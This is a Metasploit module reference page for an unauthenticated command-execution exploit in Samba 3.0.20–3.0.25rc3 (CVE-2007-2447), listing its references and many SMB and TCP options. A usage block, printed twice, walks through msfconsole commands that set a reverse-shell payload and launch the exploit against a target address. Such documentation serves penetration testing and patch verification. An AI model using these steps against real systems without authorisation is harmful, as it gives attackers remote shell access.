Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
Samba "username map script" Command Execution
This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
Rank
- Excellent
Authors
- jduck < jduck [at] metasploit.com >
References
- CVE-2007-2447
- OSVDB-34700
- BID-23972
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
- http://samba.org/samba/security/CVE-2007-2447.html
Exploit Targets
- 0 - Automatic (default)
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show payloads
msf exploit(usermap_script) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(usermap_script) > set LHOST [MY IP ADDRESS]
msf exploit(usermap_script) > set RHOST [TARGET IP]
msf exploit(usermap_script) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show payloads
msf exploit(usermap_script) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(usermap_script) > set LHOST [MY IP ADDRESS]
msf exploit(usermap_script) > set RHOST [TARGET IP]
msf exploit(usermap_script) > exploit
Module Options
| RHOST | The target address |
| RPORT | The target port (default: 139) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| NTLM::SendLM | Always send the LANMAN response (except when NTLMv2_session is specified) |
| NTLM::SendNTLM | Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses |
| NTLM::SendSPN | Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required |
| NTLM::UseLMKey | Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent |
| NTLM::UseNTLM2_session | Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session |
| NTLM::UseNTLMv2 | Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true |
| Proxies | Use a proxy chain |
| SMB::ChunkSize | The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing |
| SMB::Native_LM | The Native LM to send during authentication |
| SMB::Native_OS | The Native OS to send during authentication |
| SMB::VerifySignature | Enforces client-side verification of server response signatures |
| SMBDirect | The target port is a raw SMB service (not NetBIOS) |
| SMBDomain | The Windows domain to use for authentication |
| SMBName | The NetBIOS hostname (required for port 139 connections) |
| SMBPass | The password for the specified username |
| SMBUser | The username to authenticate as |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| SMB::obscure_trans_pipe_level | Obscure PIPE string in TransNamedPipe (level 0-3) |
| SMB::pad_data_level | Place extra padding between headers and data (level 0-3) |
| SMB::pad_file_level | Obscure path names used in open/create (level 0-3) |
| SMB::pipe_evasion | Enable segmented read/writes for SMB Pipes |
| SMB::pipe_read_max_size | Maximum buffer size for pipe reads |
| SMB::pipe_read_min_size | Minimum buffer size for pipe reads |
| SMB::pipe_write_max_size | Maximum buffer size for pipe writes |
| SMB::pipe_write_min_size | Minimum buffer size for pipe writes |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |